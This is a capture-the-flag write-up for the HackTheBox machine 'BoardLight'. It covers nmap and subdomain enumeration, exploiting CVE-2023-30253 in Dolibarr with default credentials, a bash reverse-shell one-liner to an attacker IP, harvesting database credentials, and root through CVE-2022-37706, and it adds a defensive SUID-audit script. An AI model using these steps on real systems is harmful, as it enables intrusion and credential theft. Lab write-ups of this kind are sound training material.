BoardLight

Posted 2026-03-06 | Easy | Linux | HTB

Reconnaissance

We start with an nmap scan using default scripts and version detection:

</> bash
nmap -sC -sV -oN nmap/initial 10.10.11.11

The scan reveals two open ports:

  • Port 22 — SSH (OpenSSH 8.9p1)
  • Port 80 — HTTP (Apache 2.4.54)

Enumeration

Navigating to the web server on port 80, we find a corporate website for "BoardLight". Inspecting the page source reveals a hostname: board.htb.

After adding it to /etc/hosts, we perform subdomain enumeration:

</> bash
ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 6243

This discovers crm.board.htb, which hosts a Dolibarr 17.0.0 instance.

Foothold

Dolibarr 17.0.0 is vulnerable to CVE-2023-30253 — a PHP code injection vulnerability that allows remote code execution through the website pages editor.

Default credentials admin:admin grant access to the admin panel. From there, we exploit the vulnerability:

</> bash
python3 CVE-2023-30253.py --url http://crm.board.htb --login admin --password admin -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

We catch a reverse shell as www-data.

Lateral Movement

Checking the Dolibarr configuration file:

</> bash
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

We find database credentials. Using them to query MySQL, we discover a password hash for user larissa. After cracking it, we SSH in as larissa and grab the user flag.

Privilege Escalation

Checking for SUID binaries:

</> bash
find / -perm -4000 2>/dev/null

We find an unusual SUID binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys. This binary is part of the Enlightenment desktop environment and is vulnerable to CVE-2022-37706.
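The same enumeration works as a hardening audit. The script below is an added example, not part of the original writeup: it compares SUID paths against a reviewed baseline and prints anything unexpected. The `BASELINE` allowlist, the `audit_suid` function name and the sample input are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are not on a reviewed baseline.
# BASELINE is an assumed allowlist; build a real one from a known-good
# install of the same distribution and keep it under version control.
BASELINE='/usr/bin/su
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd'

# Reads one path per line on stdin (the output of `find / -perm -4000`)
# and prints every path that is missing from BASELINE.
audit_suid() {
    while IFS= read -r path; do
        # Skip blank lines in the input.
        [ -n "$path" ] || continue
        # -x: whole-line match, -F: fixed string, so a path is never
        # treated as a regex and a prefix of an allowed path is still flagged.
        if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Constructed sample input modelled on the find output discussed above.
SAMPLE='/usr/bin/sudo
/usr/bin/passwd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/bin/mount'

# On a live host, feed the real listing instead of the sample:
#   find / -xdev -perm -4000 -type f 2>/dev/null | audit_suid
printf '%s\n' "$SAMPLE" | audit_suid
```

Each path it prints needs a decision: patch or remove the owning package, or clear the bit with `chmod u-s` if the binary does not need it.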

Running the exploit gives us a root shell:

</> bash
bash exploit.sh
whoami
# root

Root flag captured! 🏴